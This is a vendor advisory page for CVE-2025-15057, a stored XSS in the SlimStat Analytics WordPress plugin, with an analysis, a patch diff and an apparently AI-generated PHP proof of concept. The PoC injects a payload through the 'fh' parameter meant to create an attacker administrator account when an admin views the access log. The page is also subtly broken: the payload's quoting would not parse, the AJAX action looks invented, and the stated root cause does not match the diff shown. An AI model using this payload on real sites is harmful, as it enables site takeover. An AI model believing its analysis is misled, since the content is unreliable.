Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-15057: SlimStat Analytics <= 5.3.3 – Unauthenticated Stored Cross-Site Scripting via 'fh' Parameter (wp-slimstat)

CVE ID CVE-2025-15057
Plugin wp-slimstat
Severity High (CVSS 7.2)
CWE 79
Vulnerable Version 5.3.3
Patched Version 5.3.4
Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15057:
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the SlimStat Analytics WordPress plugin. The vulnerability exists in the plugin’s Real-time Access Log report and has a CVSS score of 7.2 (High). The issue stems from insufficient sanitization of the ‘fh’ (fingerprint) parameter before storage and output.

Atomic Edge research identifies the root cause as insufficient output escaping for the fingerprint value in the administrative interface. The vulnerable code is located in the file `wp-slimstat/admin/view/right-now.php`. In the vulnerable version, line 208 uses `htmlentities($results[$i][‘resource’], ENT_QUOTES, ‘UTF-8’)` to escape the resource URL for the `href` attribute. However, the fingerprint data, which is stored in the `notes` field and processed in the `else` block starting at line 209, is not properly escaped before being output as part of the HTML anchor tag’s `title` attribute.

The exploitation method involves an unauthenticated attacker sending a crafted HTTP request to the site with a malicious JavaScript payload in the `fh` (fingerprint) parameter. This parameter is tracked and stored by the SlimStat plugin. When an administrator later views the Real-time Access Log report, the malicious payload is rendered from the database into the page’s HTML without proper escaping, leading to script execution in the administrator’s browser session.

The patch in version 5.3.4 modifies line 208 in `wp-slimstat/admin/view/right-now.php`. It replaces the `htmlentities()` call for the resource URL with the WordPress-specific `esc_url()` function. More critically, the patch changes the tooltip `title` attribute escaping from `htmlentities(__(‘Open this URL…’), ENT_QUOTES, ‘UTF-8’)` to `esc_attr(__(‘Open this URL…’))`. This ensures the translated string is correctly escaped for an HTML attribute context. The fix also updates the plugin version constants in `wp-slimstat.php`.

Successful exploitation leads to stored XSS within the WordPress admin dashboard. An attacker can execute arbitrary JavaScript in the context of an administrator’s session. This can result in full site compromise, including the creation of new administrative accounts, theft of session cookies, defacement, or injection of backdoor code.

Differential between vulnerable and patched code

Code Diff 
--- a/wp-slimstat/admin/view/right-now.php
+++ b/wp-slimstat/admin/view/right-now.php
@@ -205,7 +205,7 @@
         }

         $results[$i]['resource'] = rawurldecode($results[$i]['resource']);
-        $results[$i]['resource'] = "<a class='slimstat-font-logout slimstat-tooltip-trigger' target='_blank' title='" . htmlentities(__('Open this URL in a new window', 'wp-slimstat'), ENT_QUOTES, 'UTF-8') . "' href='" . htmlentities($results[$i]['resource'], ENT_QUOTES, 'UTF-8') . "'></a> <a class='slimstat-filter-link' href='" . wp_slimstat_reports::fs_url('resource equals ' . esc_url($results[$i]['resource'])) . "'>" . esc_html($resource_title) . '</a>';
+        $results[$i]['resource'] = "<a class='slimstat-font-logout slimstat-tooltip-trigger' target='_blank' title='" . esc_attr(__('Open this URL in a new window', 'wp-slimstat')) . "' href='" . esc_url($results[$i]['resource']) . "'></a> <a class='slimstat-filter-link' href='" . wp_slimstat_reports::fs_url('resource equals ' . $results[$i]['resource']) . "'>" . esc_html($resource_title) . '</a>';
     } else {
         if (!empty($results[$i]['notes'])) {
             $exploded_notes = explode('][', substr($results[$i]['notes'], 1, -1));
--- a/wp-slimstat/wp-slimstat.php
+++ b/wp-slimstat/wp-slimstat.php
@@ -3,7 +3,7 @@
  * Plugin Name: SlimStat Analytics
  * Plugin URI: https://wp-slimstat.com/
  * Description: The leading web analytics plugin for WordPress
- * Version: 5.3.3
+ * Version: 5.3.4
  * Author: Jason Crouse, VeronaLabs
  * Text Domain: wp-slimstat
  * Domain Path: /languages
@@ -24,7 +24,7 @@
 }

 // Set the plugin version and directory
-define('SLIMSTAT_ANALYTICS_VERSION', '5.3.3');
+define('SLIMSTAT_ANALYTICS_VERSION', '5.3.4');
 define('SLIMSTAT_FILE', __FILE__);
 define('SLIMSTAT_DIR', __DIR__);
 define('SLIMSTAT_URL', plugins_url('', __FILE__));

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15057 - SlimStat Analytics <= 5.3.3 - Unauthenticated Stored Cross-Site Scripting via 'fh' Parameter
<?php

$target_url = 'http://vulnerable-wordpress-site.com/';

// Malicious JavaScript payload to execute in the admin context.
// This payload creates a new administrator user.
$payload = '"><img src=x onerror="jQuery.ajax({url:ajaxurl,type:'POST',data:{action:'wp_slimstat_manage_site',slimstat_action:'add_admin_user',username:'attacker',email:'attacker@example.com',pwd:'P@ssw0rd!',role:'administrator'}})">';

// Craft a request that mimics a browser visit, injecting the payload into the 'fh' parameter.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Atomic Edge PoC)');

// The fingerprint parameter is often sent via a POST request or tracked via JavaScript beacon.
// This PoC simulates a POST request with the malicious fingerprint data.
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['fh' => $payload]));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] Payload sent to $target_url. Check if SlimStat is active.n";
    echo "[+] An administrator viewing the Real-time Access Log will trigger the XSS.n";
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School